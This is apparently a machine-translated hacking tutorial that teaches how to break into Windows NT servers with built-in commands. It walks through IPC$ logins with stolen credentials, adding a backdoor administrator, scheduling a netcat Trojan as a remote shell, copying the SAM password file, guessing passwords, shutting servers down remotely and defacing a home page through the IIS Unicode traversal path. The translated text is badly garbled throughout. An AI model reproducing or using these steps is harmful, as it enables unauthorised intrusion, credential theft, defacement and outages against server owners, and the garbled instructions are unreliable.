1: NET As long as you have an IP username and password, use IPC $ to connect! Here us if the user you get is HBX, the password is 123456. Suppose the other party IP is 127.0.0.1 Net Use //127.0.0.1/IPC $ 123456 / user: HBX Exit command is NET Use //127.0.0.1/IPC / DELTE The following Operation You must use it. Login The method is above. ----------------------
Let's take a user to create a user, because SA's permissions are equivalent to the system's superuser. We add a Heibai user password to loveChina Net User Heibai LoveChina / add as long as the command is successful, then we can join him to the Administrator group. Net Localgroup Administrators Heibai / Add ---------------------- Here is the C disk that is mapped to each other, of course, other disks can be, as long as there is, it will be The other C disk mapped to the local Z disk. Net use z: //127.0.0.1/C $ -------------------- Net Start Telnet This can Open the other party's Telnet service. ---------------------- Here is to activate the guest user, Guest is the default user of NT, and cannot be deleted? I don't know if I am, my 2000 is deleted. NET User Guest / Active: YES ---------------------- Here is to change the password of a user, we change the password of the guest to LoveChina, other users That's also fine. As long as there is permission! Net user guest lovechina net command is really powerful! 2: AT generally leaves the back door after the invader invaded, that is, the Trojan, you pass the Trojan, how to start him? Then you need AT commands, here you have already logged in that server. You first have to get the other party, Net Time //127.0.0.1 will return a time, here the time is 12: 1, now you need to create a job, ID = 1 AT //127.0.0.1 12: 3 NC. EXE is assumed to have a Trojan, named nc.exe, this thing is on the other party server. Here you introduce NC, NC is Netcat, for convenient input, it will generally be renamed. It is a Telnet service, port is 99 . Wait until 12: 3, you can connect to the 99 port of the other party. This gives the other party to the Trojan. 3: Telnet This command is very practical, it can be connected to the distance, but you need passwords, users, but you give The other party planted Trojans, directly connected to the port of this Trojan. Telnet 127.0.0.1 99 This can be connected to the 99 port of the other party. Then you can run the command in the other party, this is the broiler. 4: ftp it can Your things are transmitted to the other party, you can apply for a space that supports FTP uploads, how many domestic is, if you can't find it, I will give a www.51.net, not bad. When we applied, It gives the user name, password, and FTP server. Need to log in before the upload, here we assume that the FTP server is www.51.net, the username is hucjs, the password is 654321 FTP
http://www.51.net
He will ask the user to enter the password after successful.
Let's talk about it first, assume that the file you need to upload is index.htm, which is in C: / Under, transfer to the other party D: / Get C: /Index.htm D: / Suppose you want to put the other party C.. HTM, down to your machine's d: copy c: /index.htm d: / 5: Copy I talk about how to copy local files to the other party hard drive, need to establish an IPC $ connection is valid. Here we copied the index.htm under the local C on the 127.0.0.1 C on Copy Index.htm //127.0.0.1/c $/index.htm -------------- -------- If you have to copy it to D, turn C to D, you will line it! Copy Index.htm //127.0.0.1/d $/index.htm ---------------------- If you have to copy him to the Winnt directory Put the input copy index.htm //127.0.0.1/admin $/index.htm admin $ is Winnt --------------------- To copy the other party Come over, the way to tell you the backed up of NT's backup in x: /winnt/repair/sam._ sam._ is copy 127.0.0.1 database under the file name below COPY //127.0.0.1 /admin is there /repair/sam._ c: / ---------------------- 6: Set if you run into a machine, and think about black (This idea can only be quasi-in special time), of course his 80 port is going to open, otherwise you will show it. You need to use the set command! Here is the result I got! Let me analyze it, just find the homepage there. COMPUTERNAME = PENTIUMII ComSpec = D: /WINNT/system32/cmd.exe CONTENT_LENGTH = 0 GATEWAY_INTERFACE = CGI / 1.1 HTTP_ACCEPT = * / * HTTP_ACCEPT_LANGUAGE = zh-cn HTTP_CONNECTION = Keep-Alive HTTP_HOST = current IP Lander, where the show was originally my IP, was I deleted HTTP_ACCEPT_ENCODING = gzip, deflate HTTP_USER_AGENT = Mozilla / 4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS = 1 Os2LibPath = D: / WINNT / system32 / os2 / dll; OS = Windows_NT Path = D: / Winnt / System32; D: / WinNT PATHEXT = .com; .exe ;.bat; .cmd path_translated = E: / VLROOT home page is put on, as long as you see the storage address of the home page after you see Path_Translated =.
Here E: / vlroot PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 0303 PROMPT = $ P $ G QUERY_STRING = / c set REMOTE_ADDR = XX.XX.XX.XX REMOTE_HOST = XX .XX.XX.XX REQUEST_METHOD = GET SCRIPT_NAME = / scripts /..% 2f ../ winnt / system32 / cmd.exe SERVER_NAME = XX.XX.XX.XX SERVER_PORT = 80 SERVER_PORT_SECURE = 0 SERVER_PROTOCOL = HTTP / 1.1 SERVER_SOFTWARE = Microsoft-IIS / 3.0 other party uses IIS / 3.0 SystemDrive = D: SystemRoot = D: / Winnt Tz = GMT-9 UserProfile = D: / WinNT / Profiles / Default User WINDIR = D: / Winnt Pink That is the other home page Store the address, tell everyone a skill, very stupid skills, but only use this method to find the name of the home page, when you dir this directory, you will see a lot of files, you can put all the files The browser enters the XX.xx.xx.xx / file name so that just see the same plane as XX.xx.xx.xx, then this is the name of the home page. 7: nbtstat If you sweep away a NT machine, his 136 to 139 one of the ports open, you have to use this command to get the user. By the way, this is NetBIOS. After getting the user name, you can guess the password. For example, a relatively simple password, password, and user name, all try, can't make a crack! Nowadays, there are many NT machines that open these ports. You can practice, we will analyze the results. The command is nbtstat -a xx.xx.xx.xx -a must be capitalized. The following is the result.
Netbios Remote Machine Name Table Name Type Status ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ --- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1b> Unique Pentiumii <03> UNIQUE INET ~ SERVICES <1C> Group is ~ Pentiumii ... <00> UNIQUE ORAHOTOWN <1E> Group ORAHOTOWN <1D> UNIQUE ..__ msbrowse __. <01> group pink is logged in Users of this system, maybe you don't know how to see, everyone is seeing a number, as long as this number is <03>, then the front is the user. The user here is Pentiumii. 8: Shutdown closed the command shutdown // ip address T: 20 seconds after 20 seconds, then the NT is turned off, and then the command can run this command, so that the other party has a lot of losses, to be a conscience invasion Yeah. 9: DIR This command is not good, but it is very important. He is all the files in a directory, folder. You can try it locally. 10: Echo famous vulnerability Unicode, this command can be simple in black with this vulnerability host. We assume that we have to take the "Nanjing Massacre" such as mountains, any Japanese must not be relied! " Echo Nanjing Massacre is a mountain, any Japanese must not redeer! > Index.htm echo Nanjing Massacre Dance is like a mountain, any Japanese must not rely! >> INDEX.HTM The first meaning is to cover the original content of index.htm, and the "Nanjing Massacre" is like a mountain, any Japanese must not be relied! "Write into index.htm. The second means is to put "Nanjing Massacre, the mountain, any Japanese, no redeenchar!" Add it inside index.htm. ">>" The resulting content will be added in the document, ">" override the original file content. Everyone can try it locally.
